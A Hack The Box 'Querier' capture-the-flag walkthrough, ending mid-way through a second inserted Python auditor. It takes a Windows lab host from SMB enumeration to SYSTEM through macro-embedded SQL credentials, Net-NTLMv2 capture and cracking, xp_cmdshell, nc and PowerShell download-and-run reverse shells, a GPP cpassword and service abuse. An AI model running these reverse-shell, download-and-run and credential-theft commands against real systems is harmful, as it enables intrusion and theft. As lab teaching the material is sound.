HTB – Querier

Today we are going to solve another CTF challenge, “Querier”, a lab presented by Hack the Box for online penetration testing practice at a range of experience levels. HTB splits its labs into two groups, Active and Retired; since write-ups of Active labs may not be published, we have chosen the retired Querier lab.

Level: Beginners

Task: find user.txt and root.txt file in the victim’s machine.

Let’s start with a basic nmap scan:

root@kali:~/htb/QUERIER# nmap -sT -p- -oA nmap-alltcp 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 07:39 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Nmap scan report for QUERIER.HTB.LOCAL (10.10.10.125)
Host is up (0.036s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 21.00 seconds

nmap shows some interesting Windows services: SMB (135/139/445), MSSQL (1433) and WinRM (5985).

SMB

Null Session Enumeration

smbmap doesn’t show anything with a null session:

root@kali# smbmap -H 10.10.10.125
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.125...
[+] IP: 10.10.10.125:445        Name: 10.10.10.125
        Disk                                                    Permissions
        ----                                                    -----------
[!] Access Denied

But the trick I learned from ippsec, an anonymous user with a bogus domain, does work:

root@kali:~/htb/QUERIER# smbmap -H 10.10.10.125 -u anonymous -d localhost
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.125...
[+] IP: 10.10.10.125:445        Name: QUERIER.HTB.LOCAL
        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    READ ONLY
        Reports                                                 READ ONLY

Alternatively, smbclient can be used:

root@kali# smbclient -N -L //10.10.10.125

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available       

The most interesting share is the one named Reports.

File

I can connect to this share, and there’s a single .xlsm file. I’ll grab a copy and exit:

root@kali# smbclient -N //10.10.10.125/Reports
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

                6469119 blocks of size 4096. 1585533 blocks available
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (92.6 KiloBytes/sec) (average 92.6 KiloBytes/sec)
smb: \> exit   

Analysis of Currency Volume Report.xlsm

.xlsm is the extension for a macro-enabled Microsoft Excel workbook. I could take this over to a Windows host and open it, but a tool like olevba (part of oletools) will dump the VBA for me on my Linux machine:

root@kali# olevba Currency\ Volume\ Report.xlsm
olevba 0.53.1 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"

  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+

The most interesting part there is the code that sets up the database connection:

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

From this, I can get a username (“reporting”) and password (“PcwTWTHRwryjc$c6”) to connect.
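As an added example (not part of the original write-up), this is the kind of check a defender can run over olevba output to flag macros that carry database credentials: it parses the ADO connection string, reports server, database and user, masks the password instead of copying it, and lists the SQL the macro actually executes (commented-out lines are ignored). The sample VBA is the ThisWorkbook module dumped above, embedded as text.

```python
import re
from typing import Dict, List

# Constructed sample: the ThisWorkbook module that olevba dumped above, embedded as text.
SAMPLE_VBA = """' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"

  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
"""

# ADO connection strings are assigned as a quoted literal; queries go through .Execute("...").
CONN_RE = re.compile(r'\.ConnectionString\s*=\s*"([^"]*)"', re.IGNORECASE)
EXEC_RE = re.compile(r'\.Execute\(\s*"([^"]*)"', re.IGNORECASE)
# Keys under which ODBC / OLE DB providers accept a clear-text password.
SECRET_KEYS = ("pwd", "password")


def strip_comments(vba: str) -> str:
    """Drop VBA comment lines (starting with ') so commented-out code is not reported as live."""
    return "\n".join(line for line in vba.splitlines() if not line.strip().startswith("'"))


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys; ADO treats keys case-insensitively."""
    pairs: Dict[str, str] = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            pairs[key.strip().lower()] = value.strip()
    return pairs


def mask(secret: str) -> str:
    """Keep two characters so a finding can be matched to a vault entry without copying the secret."""
    return secret[:2] + "*" * (len(secret) - 2) if len(secret) > 2 else "*" * len(secret)


def audit_macro(vba: str) -> Dict[str, object]:
    """Return every connection string with an embedded password plus the SQL the macro runs."""
    code = strip_comments(vba)
    connections: List[Dict[str, object]] = []
    for cs in CONN_RE.findall(code):
        kv = parse_connection_string(cs)
        secret_key = next((k for k in SECRET_KEYS if k in kv), None)
        connections.append({
            "server": kv.get("server", ""),
            "database": kv.get("database", ""),
            "uid": kv.get("uid", kv.get("user id", "")),
            # Trusted_Connection=no means SQL authentication: the password has to live in the file.
            "trusted_connection": kv.get("trusted_connection", ""),
            "embedded_password": secret_key is not None,
            "password_masked": mask(kv[secret_key]) if secret_key else "",
            "password_length": len(kv[secret_key]) if secret_key else 0,
        })
    return {"connections": connections, "queries": EXEC_RE.findall(code)}


if __name__ == "__main__":
    report = audit_macro(SAMPLE_VBA)
    for c in report["connections"]:
        print(f"{c['server']}/{c['database']} as {c['uid']}: "
              f"password in file = {c['embedded_password']} ({c['password_masked']})")
    print("queries:", report["queries"])
```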

MSSQL

Connect

Armed with a username and password, I can connect with mssqlclient.py. I’ll make sure to use the -windows-auth flag, and I’m connected:

root@kali# mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

Enumerate

Once connected, I can check out the database. I can see my current user’s permissions:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name    subentity_name    permission_name
------------   ---------------   ------------------
server                           CONNECT SQL
server                           VIEW ANY DATABASE

I can check out the databases available:

SQL> SELECT name FROM master.sys.databases
name
-----------
master
tempdb
model
msdb
volume

I can look for user-generated tables in those databases:

SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> SELECT name FROM sysobjects WHERE xtype = 'U'
name
------------    

Unfortunately, I don’t find much of interest.

Database Privesc: reporting –> mssql-svc

Capture Net-NTLMv2

Background

In Giddy, the box that Querier replaced, there was a SQL injection into a SQL Server instance, and I used the xp_dirtree procedure to make the server connect to me over SMB, where responder was listening to capture the Net-NTLMv2 exchange (see my posts on Net-NTLMv2 and Giddy). I’ll do the same thing here, just with direct database access instead of SQLi.

I’ll use xp_dirtree to list a directory, and I’ll tell the database that the directory is in an SMB share on my host. The server will try to authenticate to my host, where responder will collect the Net-NTLMv2 response. For more details, check out the [Giddy writeup] and/or [my post on Net-NTLMv2].

xp_dirtree / responder

I’ll start responder:

root@kali# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.14]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']



[+] Listening for events...

Next, I’ll call xp_dirtree against an SMB share on my host (one that doesn’t exist):

SQL> xp_dirtree '\\10.10.14.14\a';
subdirectory    depth
-------------   -----------

It doesn’t return anything, but in the responder window, I’ve captured the necessary information:

[SMBv2] NTLMv2-SSP Client   : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash     : mssql-svc::QUERIER:603386f497f98c...[snip]...
[*] Skipping previously captured hash for QUERIER\mssql-svc

Crack Net-NTLMv2

Over to hashcat, where I’ll try to brute-force the password. I can find the hash mode number here or with a simple grep on the help output:

$ hashcat -h | grep -i netntlmv2
   5600 | NetNTLMv2                                        | Network Protocols

Now crack it:

$ hashcat -m 5600 mssql-svc.netntlmv2 /usr/share/wordlists/rockyou.txt -o mssql-svc.netntlmv2.cracked --force
hashcat (v4.0.1) starting...
...[snip]...

$ cat mssql-svc.netntlmv2.cracked
MSSQL-SVC::QUERIER:603386f497f98c33:cde796e771aa42296023cfe3df531fd7:...[snip]...:corporate568

Log in as mssql-svc

Armed with the username “mssql-svc” and password “corporate568”, I can now log in with the new creds:

root@kali# mssqlclient.py mssql-svc:'corporate568'@10.10.10.125 -windows-auth
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL> 

Shell as mssql-svc

Enumeration

With access to the mssql-svc account, I have a lot more privilege on the database:

SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name     subentity_name     permission_name
-------------   ----------------   --------------------------------
server                             CONNECT SQL                                                            
server                             SHUTDOWN                                                               
server                             CREATE ENDPOINT                                                        
server                             CREATE ANY DATABASE                                                    
server                             CREATE AVAILABILITY GROUP                                              
server                             ALTER ANY LOGIN                                                        
server                             ALTER ANY CREDENTIAL                                                   
server                             ALTER ANY ENDPOINT                                                     
server                             ALTER ANY LINKED SERVER                                                
server                             ALTER ANY CONNECTION                                                   
server                             ALTER ANY DATABASE                                                     
server                             ALTER RESOURCES                                                        
server                             ALTER SETTINGS                                                         
server                             ALTER TRACE                                                            
server                             ALTER ANY AVAILABILITY GROUP                                           
server                             ADMINISTER BULK OPERATIONS                                             
server                             AUTHENTICATE SERVER                                                    
server                             EXTERNAL ACCESS ASSEMBLY                                               
server                             VIEW ANY DATABASE                                                      
server                             VIEW ANY DEFINITION                                                    
server                             VIEW SERVER STATE                                                      
server                             CREATE DDL EVENT NOTIFICATION                                          
server                             CREATE TRACE EVENT NOTIFICATION                                        
server                             ALTER ANY EVENT NOTIFICATION                                           
server                             ALTER SERVER STATE                                                     
server                             UNSAFE ASSEMBLY                                                        
server                             ALTER ANY SERVER AUDIT                                                 
server                             CREATE SERVER ROLE                                                     
server                             ALTER ANY SERVER ROLE                                                  
server                             ALTER ANY EVENT SESSION                                                
server                             CONNECT ANY DATABASE                                                   
server                             IMPERSONATE ANY LOGIN                                                  
server                             SELECT ALL USER SECURABLES                                             
server                             CONTROL SERVER  

xp_cmdshell

It still won’t let me run xp_cmdshell, the stored procedure that runs OS commands:

SQL> xp_cmdshell whoami
[-] ERROR(QUERIER): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

Note that the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I’m using, mssqlclient.py, has a built-in command that wraps xp_cmdshell, so I can just type xp_cmdshell [command].

As mssql-svc, I can enable xp_cmdshell (something I couldn’t do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft’s documentation):

-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1;
GO
-- To update the currently configured value for advanced options.
RECONFIGURE;
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1;
GO
-- To update the currently configured value for this feature.
RECONFIGURE;
GO

The shell’s alias works:

SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
querier\mssql-svc
NULL

Shell

There are many ways to get a full shell on the box. I’ll host nc on an SMB server and let Windows run it from there.

Start my SMB server:

root@kali# ls smb/
nc64.exe
root@kali# smbserver.py -smb2support a smb/
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

I’ll also start a nc listener on port 443. Then I’ll tell the Windows box to run it from the share:

SQL> xp_cmdshell \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443
output                                                            
--------------------------------------------------------------------------------
NULL  

In the nc window (remember to use rlwrap for arrow-key support):

root@kali# rlwrap nc -lnvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49683.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Alternatively, fetch and run a PowerShell reverse shell over HTTP (this run was made from a different attacking host, 10.10.14.7):

SQL> exec xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.7/puckieshell443.ps1'))" 
root@kali:~/htb/QUERIER# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.125 - - [03/Jul/2019 08:44:40] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
root@kali:~/htb/QUERIER# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49678.
Windows PowerShell running as user mssql-svc on QUERIER
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami 
querier\mssql-svc
PS C:\Windows\system32> type C:\Users\mssql-svc\Desktop\user.txt
c37*****3c16

Privesc: mssql-svc –> Administrator

Enumeration

One of the best enumeration scripts for Windows is PowerUp.ps1 from PowerSploit. To run it here, I’ll make a copy of it in the smb share:

root@kali# cp /opt/PowerSploit/Privesc/PowerUp.ps1 smb/

The nc shell is stable enough to load an interactive PowerShell session:

C:\Users\mssql-svc\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\mssql-svc\Desktop> whoami
querier\mssql-svc

Windows sometimes has issues loading PowerShell scripts directly from file shares, but I can move to temp, copy the file there, and then import it:

PS C:\Users\mssql-svc\Desktop> cd ..\appdata\local\temp

PS C:\Users\mssql-svc\appdata\local\temp> xcopy \\10.10.14.14\a\PowerUp.ps1 .
xcopy \\10.10.14.14\a\PowerUp.ps1 .
\\10.10.14.14\a\PowerUp.ps1
1 File(s) copied

PS C:\Users\mssql-svc\appdata\local\temp> . .\PowerUp.ps1
. .\PowerUp.ps1

Now I can run it with Invoke-AllChecks:

PS C:\Users\mssql-svc\appdata\local\temp> Invoke-AllChecks

Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2212
ProcessId   : 192
Name        : 192
Check       : Process Token Privileges

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

UnattendPath : C:\Windows\Panther\Unattend.xml
Name         : C:\Windows\Panther\Unattend.xml
Check        : Unattended Install Files

Changed   : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName   : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File      : C:\ProgramData\Microsoft\Group
            Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
Check     : Cached GPP Files

Alternatively, load it directly from a web server:

PS C:\users\public> IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.7/powerup.ps1')
[*] Running Invoke-AllChecks
...

There’s a ton of interesting stuff in here, and I’ll spend some time on each of these in Beyond Root. For now, I’ll jump on the most obvious result, the GPP password file with the username / password combination of “Administrator” / “MyUnclesAreMarioAndLuigi!!1!”.

Administrator Shell

With the administrator account password, a shell is pretty simple. I’ll use wmiexec:

root@kali# wmiexec.py 'administrator:MyUnclesAreMarioAndLuigi!!1!@10.10.10.125'
Impacket v0.9.19-dev - Copyright 2018 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
querier\administrator

From there, root.txt is simple:

C:\users\administrator\desktop>type root.txt
b19c3794...

Beyond Root

Overview of results

PowerUp showed five potential paths to SYSTEM:

  • SeImpersonatePrivilege
  • Modifiable Service – UsoSvc
  • %PATH% .dll Hijacks
  • Unattended Install Files
  • Cached GPP Files

I used the last one to get Administrator access in the main write-up, as it simply provided the administrator credentials and is easy to understand.

I’ll take a look at the other four results.

RIP Juicy Potato

It seems Microsoft may have fixed the path from SeImpersonatePrivilege to SYSTEM (Juicy Potato) in Server 2019, and that’s what this host is:

PS C:\Users\mssql-svc\Desktop> gwmi win32_operatingsystem | % caption
Microsoft Windows Server 2019 Standard 

So this is a dead end.

Unattended Install Files

Jumping to the fourth item, unattend.xml files can contain passwords. Unfortunately for me, not in these:

PS C:\windows\panther> type unattend.xml | findstr /i password
type unattend.xml | findstr /i password
     <Password>*SENSITIVE*DATA*DELETED*</Password>
       <Password>*SENSITIVE*DATA*DELETED*</Password>

Modifiable Service Abuse

One thing that Invoke-AllChecks runs is the Get-ModifiableService cmdlet. It:

Enumerates all services and returns services for which the current user can modify the binPath.

This is what produced the following output when I ran Invoke-AllChecks above:

ServiceName   : UsoSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart    : True
Name          : UsoSvc
Check         : Modifiable Services

They suggest running Invoke-ServiceAbuse. I’ll take a look at the source for this function. It will enable the service (if it isn’t already enabled) and back up the current service binary path. It will then set the service to run the input command, start the service, wait, stop the service, and restore the original binary path. Since CanRestart is True for UsoSvc, mssql-svc is allowed to restart it:

PS C:\users\public> Restart-Service UsoSvc

PS C:\Users\mssql-svc\AppData\Local\Temp> Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443"                                                                                                 
Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443"

ServiceAbused Command
------------- -------
UsoSvc        \\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 443

And get a shell as SYSTEM:

root@kali# nc -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49682.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

However, because the script is made to run a command and then stop the service, the shell dies quickly (even if it tried to leave it running, nc64.exe isn’t a service binary, so it would die very quickly). I could use msfvenom to create a proper service binary, or I can just have the first shell execute nc again. That new nc process will live on even after its parent has died:

root@kali# nc -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.125.
Ncat: Connection from 10.10.10.125:49686.
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 444
\\10.10.14.14\a\nc64.exe -e cmd.exe 10.10.14.14 444

I could also have had the PowerUp command add an admin user, or schedule a task to run nc and connect back to me every minute. Both of those commands would run and finish quickly, without issue.

.dll Hijack

Invoke-AllChecks also runs Find-PathDLLHijack, which:

Enumerates the paths stored in Env:Path (%PATH) and filters each through Get-ModifiablePath to return the folder paths the current user can write to.

The run on Querier returned:

ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

It’s saying that I can write a DLL into that WindowsApps folder under AppData, which is on the PATH. The problem is that I don’t have a good way to restart a service or anything else that will load this DLL while running as Administrator or SYSTEM, so it’s a dead end for HTB.

Manual Exploitation (Group Policy Preference Password Finder)

To do this manually, browse to the Groups.xml file (normally published from a share on the domain controller; here a locally cached copy sits under C:\ProgramData\Microsoft\Group Policy\History) and read the value of its cpassword attribute.

PS C:\programdata> cmd.exe /c "dir /s /b |findstr Group" 
C:\programdata\Microsoft\Group Policy
C:\programdata\Microsoft\Group Policy\Trace
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups
C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

PS C:\programdata> get-content "C:\programdata\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml"
<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator" image="2" changed="2019-01-28 23:12:48" uid="{CD450F70-CDB8-4948-B908-F8D038C59B6C}" userContext="0" removePolicy="0" policyApplied="1">
<Properties action="U" newName="" fullName="" description="" cpassword="CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="Administrator"></Properties></User></Groups>
PS C:\programdata> 

This value can then be passed to a tool that decrypts it, such as gp3finder:

c:\PENTEST>gp3finder.exe

Group Policy Preference Password Finder (GP3Finder) $Revision: 4.0 $
Copyright (C) 2015 Oliver Morton (Sec-1 Ltd)
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

Specify: encrypt, decrypt or auto.
usage: gp3finder.exe [-h] [-D DECRYPT | -E ENCRYPT | -A] [-l] [-lr LOCAL_ROOT]
[-rr REMOTE_ROOT] [-o OUTFILE] [-t HOSTS [HOSTS ...] | -f
FILE] [-v] [-V] [-u USER] [-s SHARE]

c:\PENTEST>gp3finder.exe -D CiDUq6tbrBL1m/js9DmZNIydXpsE69WB9JrhwYRW9xywOz1/0W5VCUz8tBPXUkk9y80n4vw74KeUWc2+BeOVDQ

Group Policy Preference Password Finder (GP3Finder) $Revision: 4.0 $
Copyright (C) 2015 Oliver Morton (Sec-1 Ltd)
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.

MyUnclesAreMarioAndLuigi!!1!
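An auditor's version of the same lookup, as an added example (not from the original write-up or from gp3finder): it parses Group Policy Preference XML, reports every element that still carries a cpassword, and treats the presence of the value itself as the finding, since the AES-256 key that protects it is published (MS14-025) and the ciphertext length shows it is a padded password. The sample XML is the Groups.xml printed above; the file names and account attributes are the ones GPP uses, and the directory walker is for a SYSVOL copy or the local History cache.

```python
import base64
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# Preferences files that can carry a cpassword (MS14-025). The KB2962486 fix stops new values being
# written but leaves existing entries in SYSVOL and in the local History cache seen above.
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Printers.xml", "Drives.xml")
# The attribute naming the account differs per preference type.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")

# Constructed sample: the Groups.xml that Get-Content printed above, embedded as bytes.
SAMPLE_GROUPS_XML = b"""<?xml version="1.0" encoding="UTF-8" ?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
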